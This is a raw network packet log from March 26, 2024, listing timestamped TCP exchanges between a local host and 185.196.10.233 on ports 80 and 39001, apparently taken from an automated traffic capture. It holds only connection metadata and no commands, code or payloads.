Mar 26, 2024 18:23:16.628393888 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628429890 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628459930 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628479004 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628494024 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628518105 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628530025 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628535986 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628546000 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628576994 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628591061 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628606081 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628648043 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628654957 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628669977 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628705978 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628716946 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628756046 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628770113 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628810883 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628812075 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628829956 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628844023 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628874063 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628904104 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.755017042 CET	39001	49727	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.756305933 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814395905 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814424038 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814436913 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814455032 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814469099 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814488888 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814510107 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814508915 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814522982 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814541101 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814551115 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814558983 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814564943 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814577103 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814591885 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814595938 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814631939 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814666986 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814682961 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814698935 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814718008 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814732075 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814738035 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814764023 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814779997 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814798117 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814822912 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814848900 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814856052 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814872980 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814884901 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814915895 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814948082 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.814953089 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.814985991 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815016031 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815030098 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815053940 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815082073 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815116882 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815120935 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815150976 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815167904 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815187931 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815260887 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815274954 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815287113 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815304041 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815310955 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815341949 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815355062 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815363884 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815372944 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815378904 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815386057 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815404892 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815413952 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815422058 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815434933 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815464973 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815470934 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815493107 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815515995 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815532923 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815546036 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815557003 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815558910 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815588951 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815597057 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.815601110 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.815623045 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.865389109 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.866699934 CET	49729	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.900079966 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.942828894 CET	39001	49727	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.942984104 CET	39001	49727	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.943085909 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.054439068 CET	39001	49729	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:17.054560900 CET	49729	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.073023081 CET	49729	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.086692095 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:17.086710930 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:17.086769104 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.300687075 CET	39001	49729	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:17.300761938 CET	49729	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.511441946 CET	39001	49729	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:17.552865028 CET	49729	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.739413977 CET	39001	49729	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:17.787235975 CET	49729	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:17.850583076 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.037269115 CET	39001	49730	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:18.037348986 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.051851988 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.284636974 CET	39001	49730	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:18.284696102 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.502605915 CET	39001	49730	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:18.552898884 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.739392042 CET	39001	49730	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:18.740176916 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.852885008 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:18.926620960 CET	39001	49730	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:18.926898956 CET	39001	49730	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:18.926963091 CET	49730	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.039712906 CET	39001	49731	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:19.039983034 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.054121017 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.284601927 CET	39001	49731	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:19.284661055 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.517509937 CET	39001	49731	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:19.571254969 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.757745981 CET	39001	49731	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:19.758589983 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.866946936 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:19.945105076 CET	39001	49731	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:19.945338964 CET	39001	49731	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:19.945492029 CET	49731	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.053802967 CET	39001	49733	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:20.053878069 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.069219112 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.300520897 CET	39001	49733	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:20.300573111 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.508043051 CET	39001	49733	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:20.552902937 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.739456892 CET	39001	49733	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:20.740631104 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.856240988 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:20.927103043 CET	39001	49733	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:20.927222967 CET	39001	49733	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:20.929519892 CET	49733	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:21.043103933 CET	39001	49734	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:21.044915915 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:21.148691893 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:21.378446102 CET	39001	49734	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:21.381323099 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:21.587028027 CET	39001	49734	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:21.631033897 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:21.819731951 CET	39001	49734	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:21.820681095 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:22.009293079 CET	39001	49734	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:22.011543989 CET	39001	49734	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:22.011622906 CET	49734	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:23.708297968 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:23.895431042 CET	39001	49736	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:23.895519972 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:24.033180952 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:24.269160986 CET	39001	49736	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:24.269217968 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:24.477576971 CET	39001	49736	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:24.568540096 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:24.754926920 CET	39001	49736	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:24.768961906 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:24.887242079 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:24.955492973 CET	39001	49736	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:24.955940008 CET	39001	49736	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:24.956733942 CET	49736	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:25.074068069 CET	39001	49737	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:25.074229002 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:25.089859962 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:25.331636906 CET	39001	49737	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:25.337311983 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:25.546047926 CET	39001	49737	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:25.631335020 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:25.817841053 CET	39001	49737	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:25.927973032 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:25.943223000 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:26.069876909 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:26.131052017 CET	39001	49737	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:26.131437063 CET	39001	49737	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:26.131493092 CET	49737	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:26.256778002 CET	39001	49740	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:26.256867886 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:26.309369087 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:26.550329924 CET	39001	49740	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:26.550457954 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:26.761850119 CET	39001	49740	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:26.927995920 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.114816904 CET	39001	49740	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:27.115600109 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.225508928 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.302269936 CET	39001	49740	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:27.302350998 CET	39001	49740	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:27.303307056 CET	49740	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.412420988 CET	39001	49741	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:27.412574053 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.428814888 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.659727097 CET	39001	49741	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:27.659970045 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:27.867945910 CET	39001	49741	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:28.068527937 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:28.255125999 CET	39001	49741	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:28.256557941 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:28.381855011 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:28.443234921 CET	39001	49741	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:28.443398952 CET	39001	49741	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:28.443458080 CET	49741	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:28.568486929 CET	39001	49742	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:28.568558931 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:28.599324942 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:28.831659079 CET	39001	49742	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:28.831796885 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.038464069 CET	39001	49742	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:29.131521940 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.317984104 CET	39001	49742	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:29.322272062 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.429255962 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.508897066 CET	39001	49742	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:29.509080887 CET	39001	49742	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:29.509246111 CET	49742	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.616214991 CET	39001	49743	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:29.616400957 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.631755114 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:29.863053083 CET	39001	49743	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:29.863115072 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:30.070429087 CET	39001	49743	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:30.256041050 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:30.442435980 CET	39001	49743	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:30.443176985 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:30.554177999 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:30.629525900 CET	39001	49743	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:30.629717112 CET	39001	49743	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:30.629761934 CET	49743	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:30.740784883 CET	39001	49744	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:30.740854979 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:30.770406008 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.003840923 CET	39001	49744	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:31.003962040 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.211008072 CET	39001	49744	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:31.424474001 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.610882044 CET	39001	49744	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:31.615251064 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.729315042 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.801737070 CET	39001	49744	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:31.801964998 CET	39001	49744	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:31.803289890 CET	49744	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.916132927 CET	39001	49745	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:31.916198015 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:31.939284086 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.175476074 CET	39001	49745	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:32.175535917 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.383270979 CET	39001	49745	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:32.427906990 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.614561081 CET	39001	49745	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:32.615386963 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.726346970 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.802119017 CET	39001	49745	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:32.802361012 CET	39001	49745	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:32.802408934 CET	49745	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.912916899 CET	39001	49746	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:32.913189888 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:32.926855087 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.159758091 CET	39001	49746	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:33.159874916 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.366466999 CET	39001	49746	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:33.427930117 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.614263058 CET	39001	49746	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:33.615161896 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.725568056 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.801687002 CET	39001	49746	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:33.801961899 CET	39001	49746	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:33.802117109 CET	49746	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.912161112 CET	39001	49747	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:33.912234068 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:33.926662922 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.159683943 CET	39001	49747	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:34.159766912 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.368536949 CET	39001	49747	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:34.412343979 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.598964930 CET	39001	49747	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:34.599971056 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.709980965 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.786461115 CET	39001	49747	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:34.786721945 CET	39001	49747	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:34.786799908 CET	49747	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.896625996 CET	39001	49748	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:34.896806955 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:34.913188934 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.144196033 CET	39001	49748	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:35.144315958 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.350943089 CET	39001	49748	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:35.399379015 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.585823059 CET	39001	49748	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:35.586559057 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.694799900 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.773194075 CET	39001	49748	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:35.773722887 CET	39001	49748	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:35.773808956 CET	49748	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.881308079 CET	39001	49749	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:35.881411076 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:35.896078110 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:36.128453016 CET	39001	49749	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:36.128530025 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:36.338990927 CET	39001	49749	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:36.427908897 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:36.615607023 CET	39001	49749	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:36.616380930 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:36.729792118 CET	49750	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:36.803036928 CET	39001	49749	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:36.803144932 CET	39001	49749	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:36.803196907 CET	49749	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:36.917049885 CET	39001	49750	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:36.917146921 CET	49750	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:37.142643929 CET	49750	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:37.378501892 CET	39001	49750	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:37.378598928 CET	49750	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:37.591972113 CET	39001	49750	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:37.646687031 CET	49750	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:37.833144903 CET	39001	49750	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:37.834403038 CET	49750	39001	192.168.2.5	185.196.10.233
